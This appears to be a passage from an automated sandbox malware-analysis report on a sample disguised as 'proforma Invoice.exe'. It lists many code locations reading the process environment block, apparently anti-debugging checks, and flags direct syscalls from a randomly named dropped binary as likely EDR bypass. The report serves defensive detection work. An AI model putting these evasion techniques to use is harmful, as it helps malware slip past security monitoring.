                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198620 mov eax, dword ptr fs:[00000030h]3_2_01198620
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116262C mov eax, dword ptr fs:[00000030h]3_2_0116262C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122866E mov eax, dword ptr fs:[00000030h]3_2_0122866E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122866E mov eax, dword ptr fs:[00000030h]3_2_0122866E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117C640 mov eax, dword ptr fs:[00000030h]3_2_0117C640
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01192674 mov eax, dword ptr fs:[00000030h]3_2_01192674
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A660 mov eax, dword ptr fs:[00000030h]3_2_0119A660
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A660 mov eax, dword ptr fs:[00000030h]3_2_0119A660
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164690 mov eax, dword ptr fs:[00000030h]3_2_01164690
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164690 mov eax, dword ptr fs:[00000030h]3_2_01164690
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011966B0 mov eax, dword ptr fs:[00000030h]3_2_011966B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C6A6 mov eax, dword ptr fs:[00000030h]3_2_0119C6A6
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0119A6C7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A6C7 mov eax, dword ptr fs:[00000030h]3_2_0119A6C7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E06F1 mov eax, dword ptr fs:[00000030h]3_2_011E06F1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E06F1 mov eax, dword ptr fs:[00000030h]3_2_011E06F1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EC912 mov eax, dword ptr fs:[00000030h]3_2_011EC912
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01158918 mov eax, dword ptr fs:[00000030h]3_2_01158918
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01158918 mov eax, dword ptr fs:[00000030h]3_2_01158918
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE908 mov eax, dword ptr fs:[00000030h]3_2_011DE908
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE908 mov eax, dword ptr fs:[00000030h]3_2_011DE908
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E892A mov eax, dword ptr fs:[00000030h]3_2_011E892A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F892B mov eax, dword ptr fs:[00000030h]3_2_011F892B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E0946 mov eax, dword ptr fs:[00000030h]3_2_011E0946
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01204978 mov eax, dword ptr fs:[00000030h]3_2_01204978
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01204978 mov eax, dword ptr fs:[00000030h]3_2_01204978
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EC97C mov eax, dword ptr fs:[00000030h]3_2_011EC97C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A096E mov eax, dword ptr fs:[00000030h]3_2_011A096E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A096E mov edx, dword ptr fs:[00000030h]3_2_011A096E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A096E mov eax, dword ptr fs:[00000030h]3_2_011A096E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01186962 mov eax, dword ptr fs:[00000030h]3_2_01186962
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01186962 mov eax, dword ptr fs:[00000030h]3_2_01186962
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01186962 mov eax, dword ptr fs:[00000030h]3_2_01186962
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E89B3 mov esi, dword ptr fs:[00000030h]3_2_011E89B3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E89B3 mov eax, dword ptr fs:[00000030h]3_2_011E89B3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E89B3 mov eax, dword ptr fs:[00000030h]3_2_011E89B3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A0 mov eax, dword ptr fs:[00000030h]3_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011609AD mov eax, dword ptr fs:[00000030h]3_2_011609AD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011609AD mov eax, dword ptr fs:[00000030h]3_2_011609AD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A9D0 mov eax, dword ptr fs:[00000030h]3_2_0116A9D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A9D0 mov eax, dword ptr fs:[00000030h]3_2_0116A9D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A9D0 mov eax, dword ptr fs:[00000030h]3_2_0116A9D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A9D0 mov eax, dword ptr fs:[00000030h]3_2_0116A9D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A9D0 mov eax, dword ptr fs:[00000030h]3_2_0116A9D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A9D0 mov eax, dword ptr fs:[00000030h]3_2_0116A9D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011949D0 mov eax, dword ptr fs:[00000030h]3_2_011949D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F69C0 mov eax, dword ptr fs:[00000030h]3_2_011F69C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011929F9 mov eax, dword ptr fs:[00000030h]3_2_011929F9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011929F9 mov eax, dword ptr fs:[00000030h]3_2_011929F9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122A9D3 mov eax, dword ptr fs:[00000030h]3_2_0122A9D3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EE9E0 mov eax, dword ptr fs:[00000030h]3_2_011EE9E0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EC810 mov eax, dword ptr fs:[00000030h]3_2_011EC810
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120483A mov eax, dword ptr fs:[00000030h]3_2_0120483A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120483A mov eax, dword ptr fs:[00000030h]3_2_0120483A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A830 mov eax, dword ptr fs:[00000030h]3_2_0119A830
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01182835 mov eax, dword ptr fs:[00000030h]3_2_01182835
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01182835 mov eax, dword ptr fs:[00000030h]3_2_01182835
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01182835 mov eax, dword ptr fs:[00000030h]3_2_01182835
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01182835 mov ecx, dword ptr fs:[00000030h]3_2_01182835
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01182835 mov eax, dword ptr fs:[00000030h]3_2_01182835
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01182835 mov eax, dword ptr fs:[00000030h]3_2_01182835
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01190854 mov eax, dword ptr fs:[00000030h]3_2_01190854
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164859 mov eax, dword ptr fs:[00000030h]3_2_01164859
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164859 mov eax, dword ptr fs:[00000030h]3_2_01164859
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01172840 mov ecx, dword ptr fs:[00000030h]3_2_01172840
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EE872 mov eax, dword ptr fs:[00000030h]3_2_011EE872
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EE872 mov eax, dword ptr fs:[00000030h]3_2_011EE872
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F6870 mov eax, dword ptr fs:[00000030h]3_2_011F6870
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F6870 mov eax, dword ptr fs:[00000030h]3_2_011F6870
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EC89D mov eax, dword ptr fs:[00000030h]3_2_011EC89D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160887 mov eax, dword ptr fs:[00000030h]3_2_01160887
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122A8E4 mov eax, dword ptr fs:[00000030h]3_2_0122A8E4
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E8C0 mov eax, dword ptr fs:[00000030h]3_2_0118E8C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C8F9 mov eax, dword ptr fs:[00000030h]3_2_0119C8F9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C8F9 mov eax, dword ptr fs:[00000030h]3_2_0119C8F9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DEB1D mov eax, dword ptr fs:[00000030h]3_2_011DEB1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01228B28 mov eax, dword ptr fs:[00000030h]3_2_01228B28
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01228B28 mov eax, dword ptr fs:[00000030h]3_2_01228B28
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118EB20 mov eax, dword ptr fs:[00000030h]3_2_0118EB20
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118EB20 mov eax, dword ptr fs:[00000030h]3_2_0118EB20
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F6B40 mov eax, dword ptr fs:[00000030h]3_2_011F6B40
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F6B40 mov eax, dword ptr fs:[00000030h]3_2_011F6B40
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122AB40 mov eax, dword ptr fs:[00000030h]3_2_0122AB40
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01208B42 mov eax, dword ptr fs:[00000030h]3_2_01208B42
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115CB7E mov eax, dword ptr fs:[00000030h]3_2_0115CB7E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170BBE mov eax, dword ptr fs:[00000030h]3_2_01170BBE
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170BBE mov eax, dword ptr fs:[00000030h]3_2_01170BBE
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01180BCB mov eax, dword ptr fs:[00000030h]3_2_01180BCB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01180BCB mov eax, dword ptr fs:[00000030h]3_2_01180BCB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01180BCB mov eax, dword ptr fs:[00000030h]3_2_01180BCB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160BCD mov eax, dword ptr fs:[00000030h]3_2_01160BCD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160BCD mov eax, dword ptr fs:[00000030h]3_2_01160BCD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160BCD mov eax, dword ptr fs:[00000030h]3_2_01160BCD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118EBFC mov eax, dword ptr fs:[00000030h]3_2_0118EBFC
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168BF0 mov eax, dword ptr fs:[00000030h]3_2_01168BF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168BF0 mov eax, dword ptr fs:[00000030h]3_2_01168BF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168BF0 mov eax, dword ptr fs:[00000030h]3_2_01168BF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011ECBF0 mov eax, dword ptr fs:[00000030h]3_2_011ECBF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120EBD0 mov eax, dword ptr fs:[00000030h]3_2_0120EBD0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011ECA11 mov eax, dword ptr fs:[00000030h]3_2_011ECA11
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CA38 mov eax, dword ptr fs:[00000030h]3_2_0119CA38
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01184A35 mov eax, dword ptr fs:[00000030h]3_2_01184A35
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01184A35 mov eax, dword ptr fs:[00000030h]3_2_01184A35
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118EA2E mov eax, dword ptr fs:[00000030h]3_2_0118EA2E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CA24 mov eax, dword ptr fs:[00000030h]3_2_0119CA24
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166A50 mov eax, dword ptr fs:[00000030h]3_2_01166A50
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166A50 mov eax, dword ptr fs:[00000030h]3_2_01166A50
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166A50 mov eax, dword ptr fs:[00000030h]3_2_01166A50
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166A50 mov eax, dword ptr fs:[00000030h]3_2_01166A50
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166A50 mov eax, dword ptr fs:[00000030h]3_2_01166A50
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166A50 mov eax, dword ptr fs:[00000030h]3_2_01166A50
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166A50 mov eax, dword ptr fs:[00000030h]3_2_01166A50
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170A5B mov eax, dword ptr fs:[00000030h]3_2_01170A5B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170A5B mov eax, dword ptr fs:[00000030h]3_2_01170A5B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DCA72 mov eax, dword ptr fs:[00000030h]3_2_011DCA72
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DCA72 mov eax, dword ptr fs:[00000030h]3_2_011DCA72
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CA6F mov eax, dword ptr fs:[00000030h]3_2_0119CA6F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CA6F mov eax, dword ptr fs:[00000030h]3_2_0119CA6F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CA6F mov eax, dword ptr fs:[00000030h]3_2_0119CA6F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198A90 mov edx, dword ptr fs:[00000030h]3_2_01198A90
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA80 mov eax, dword ptr fs:[00000030h]3_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234A80 mov eax, dword ptr fs:[00000030h]3_2_01234A80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168AA0 mov eax, dword ptr fs:[00000030h]3_2_01168AA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168AA0 mov eax, dword ptr fs:[00000030h]3_2_01168AA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011B6AA4 mov eax, dword ptr fs:[00000030h]3_2_011B6AA4
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160AD0 mov eax, dword ptr fs:[00000030h]3_2_01160AD0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01194AD0 mov eax, dword ptr fs:[00000030h]3_2_01194AD0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01194AD0 mov eax, dword ptr fs:[00000030h]3_2_01194AD0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011B6ACC mov eax, dword ptr fs:[00000030h]3_2_011B6ACC
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011B6ACC mov eax, dword ptr fs:[00000030h]3_2_011B6ACC
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011B6ACC mov eax, dword ptr fs:[00000030h]3_2_011B6ACC
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119AAEE mov eax, dword ptr fs:[00000030h]3_2_0119AAEE
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119AAEE mov eax, dword ptr fs:[00000030h]3_2_0119AAEE
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01194D1D mov eax, dword ptr fs:[00000030h]3_2_01194D1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01156D10 mov eax, dword ptr fs:[00000030h]3_2_01156D10
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01156D10 mov eax, dword ptr fs:[00000030h]3_2_01156D10
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01156D10 mov eax, dword ptr fs:[00000030h]3_2_01156D10
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117AD00 mov eax, dword ptr fs:[00000030h]3_2_0117AD00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117AD00 mov eax, dword ptr fs:[00000030h]3_2_0117AD00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117AD00 mov eax, dword ptr fs:[00000030h]3_2_0117AD00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01218D10 mov eax, dword ptr fs:[00000030h]3_2_01218D10
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01218D10 mov eax, dword ptr fs:[00000030h]3_2_01218D10
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E8D20 mov eax, dword ptr fs:[00000030h]3_2_011E8D20
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160D59 mov eax, dword ptr fs:[00000030h]3_2_01160D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160D59 mov eax, dword ptr fs:[00000030h]3_2_01160D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160D59 mov eax, dword ptr fs:[00000030h]3_2_01160D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168D59 mov eax, dword ptr fs:[00000030h]3_2_01168D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168D59 mov eax, dword ptr fs:[00000030h]3_2_01168D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168D59 mov eax, dword ptr fs:[00000030h]3_2_01168D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168D59 mov eax, dword ptr fs:[00000030h]3_2_01168D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168D59 mov eax, dword ptr fs:[00000030h]3_2_01168D59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F8D6B mov eax, dword ptr fs:[00000030h]3_2_011F8D6B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01228DAE mov eax, dword ptr fs:[00000030h]3_2_01228DAE
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01228DAE mov eax, dword ptr fs:[00000030h]3_2_01228DAE
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234DAD mov eax, dword ptr fs:[00000030h]3_2_01234DAD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01188DBF mov eax, dword ptr fs:[00000030h]3_2_01188DBF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01188DBF mov eax, dword ptr fs:[00000030h]3_2_01188DBF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CDB1 mov ecx, dword ptr fs:[00000030h]3_2_0119CDB1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CDB1 mov eax, dword ptr fs:[00000030h]3_2_0119CDB1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119CDB1 mov eax, dword ptr fs:[00000030h]3_2_0119CDB1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01196DA0 mov eax, dword ptr fs:[00000030h]3_2_01196DA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E4DD7 mov eax, dword ptr fs:[00000030h]3_2_011E4DD7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E4DD7 mov eax, dword ptr fs:[00000030h]3_2_011E4DD7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118EDD3 mov eax, dword ptr fs:[00000030h]3_2_0118EDD3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118EDD3 mov eax, dword ptr fs:[00000030h]3_2_0118EDD3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01200DF0 mov eax, dword ptr fs:[00000030h]3_2_01200DF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
